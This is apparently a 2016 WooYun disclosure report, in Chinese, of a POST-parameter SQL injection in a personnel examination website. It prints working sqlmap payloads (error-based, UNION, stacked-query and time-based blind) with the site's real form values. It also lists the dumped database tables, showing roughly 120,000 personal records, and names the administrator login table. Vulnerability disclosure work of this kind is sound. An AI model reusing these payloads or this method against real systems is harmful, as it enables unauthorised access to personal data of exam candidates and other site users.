乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
某人事考试post类型sql注入12万信息泄露
js过滤放到burp里面检测下
出错了抓到的包放到sqlmap里面
Place: POSTParameter: xmtxt Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' AND 5271=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (5271=5271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58))) AND 'bbYT'='bbYT&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+CHAR(74)+CHAR(109)+CHAR(69)+CHAR(108)+CHAR(70)+CHAR(71)+CHAR(78)+CHAR(118)+CHAR(114)+CHAR(79)+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58)-- &zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����'; WAITFOR DELAY '0:0:5';--&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' WAITFOR DELAY '0:0:5'--&zjlx=0&sfzhtxt=111111111111111&Button1=�� ѯ---
当时忘记截图了=-=
Database: chinaexamcj+---------------------------+---------+| Table | Entries |+---------------------------+---------+| dbo.dhjm1 | 121137 || dbo.dh0609 | 119579 || dbo.mm | 119541 || dbo.dhjm | 86390 || dbo.dh0608 | 14774 || dbo.dh0607 | 12176 || dbo.ly_view_gwyResult | 4410 || dbo.ly_view_codeitem | 2443 || dbo.SR_CodeItem | 2440 || dbo.ly_view_codeitemPre | 2397 || dbo.web_Gwy_ZwZy | 2395 || dbo.ly_view_codeitem2 | 2363 || dbo.web_GWY_Extra | 2205 || dbo.dhbz | 1944 || dbo.kd05 | 1200 || dbo.cj01201409 | 703 || dbo.cj02201505 | 500 || dbo.SM_Log | 286 || dbo.SR_BuiltItem | 125 || dbo.web_SR_ExamCode | 117 || dbo.SR_SourceItem | 107 || dbo.ly_sr_viewBItemt | 98 || dbo.ly_sr_viewBItem | 89 || dbo.ly_sr_viewBItem_old | 89 || dbo.web_SR_CodeItem | 86 || dbo.ly_view_examSys | 79 || dbo.web_tbl_menu | 71 || dbo.Sr_ReLog | 50 || dbo.sr_SDKSAud | 49 || dbo.Sr_WjType | 48 || dbo.web_tbl_log | 42 || dbo.SR_AppModal | 41 || dbo.sr_map | 41 || dbo.SR_BmInputSet | 33 || dbo.Sr_NHcode | 32 || dbo.Fld_View | 25 || dbo.web_tbl_ac_power | 17 || dbo.Sr_Nx | 16 || dbo.WEB_SR_examInfo | 16 || dbo.sr_BuiltExamReg | 15 || dbo.web_tbl_menuFlow | 13 || dbo.Results | 11 || dbo.SR_CodeCollectSys | 11 || dbo.Fld | 10 || dbo.SR_CodeCollect | 10 || dbo.web_tbl_config_system | 10 || dbo.ly_view_menu | 9 || dbo.SR_ExamWork | 9 || dbo.web_tbl_act_system | 9 || dbo.cfl_view_ShenHe | 8 || dbo.web_exam_AudCode | 8 || dbo.Web_KsRegister | 8 || dbo.web_ShenHe | 8 || dbo.dtproperties | 7 || dbo.ly_view_login | 7 || dbo.Prj_Import | 7 || dbo.SR_BuiltCollect | 7 || dbo.SR_RptFldItem | 7 || dbo.SR_SourceCollect | 7 || dbo.web_SR_examList | 7 || dbo.web_sr_report | 7 || dbo.web_tbl_login | 7 || dbo.ly_view_groupTree | 6 || dbo.web_tbl_rule | 6 || dbo.ZwMsYS | 6 || dbo.ly_view_examInfo | 5 || dbo.sr_BuiltExamRegDate | 5 || dbo.Sr_WjDispose | 5 || dbo.EI_ExamTreeDesc | 4 || dbo.ly_view_setTable | 4 || dbo.Web_KsFlow | 4 || dbo.WEB_SR_SetTable | 4 || dbo.WEB_SR_SetTime | 4 || dbo.web_tbl_group | 4 || dbo.AMEDIA01 | 3 || dbo.cfl_cjcx_examlist | 3 || dbo.EI_SubjectDesc | 3 || dbo.Hmc_Font | 3 || dbo.ly_view_examDate | 3 || dbo.ly_view_examDate2 | 3 || dbo.ly_view_JgBuilt | 3 || dbo.ly_view_srEexamFy | 3 || dbo.SR_CardReprot | 3 || dbo.SR_JgBuilt | 3 || dbo.sr_SjbhGz | 3 || dbo.web_cjcard | 3 || dbo.web_SR_examFY | 3 || dbo.ZwMsSet | 3 || dbo.Kc_TdbGridWidth | 2 || dbo.Sr_ZwAddFs | 2 || dbo.web_cjcx_examlist | 2 || dbo.web_exam_AudFlow | 2 || dbo.web_sr_netPay | 2 || dbo.web_tbl_group_system | 2 || dbo.MQ_VIEW_ExamInf | 1 || dbo.MQ_VIEW_Jg | 1 || dbo.SR_KcTj | 1 || dbo.SR_KcTj1 | 1 || dbo.sr_ksList | 1 || dbo.sr_ksListAll | 1 || dbo.Sr_SerialNo | 1 || dbo.SR_SetTime | 1 || dbo.SR_StartExam | 1 || dbo.sysdiagrams | 1 || dbo.TT_Jgkd | 1 || dbo.tt_kdjg | 1 || dbo.TT_KsSj | 1 || dbo.TT_Ksxx | 1 || dbo.TT_Subject | 1 || dbo.TT_Zykm | 1 || dbo.Web_kqzw | 1 |+---------------------------+---------+
管理员表dbo.web_tbl_login
不知道是什么加密方式____朋友说是AEC还是什么的>_<后台地址:http://**.**.**.**/Manage/Default.aspx这洞还行吧_给我新手一个机会___求过啊!
别用js验证了呃呃呃我也不太懂嗯就这样
危害等级:中
漏洞Rank:8
确认时间:2016-01-15 15:51
CNVD确认未复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.
暂无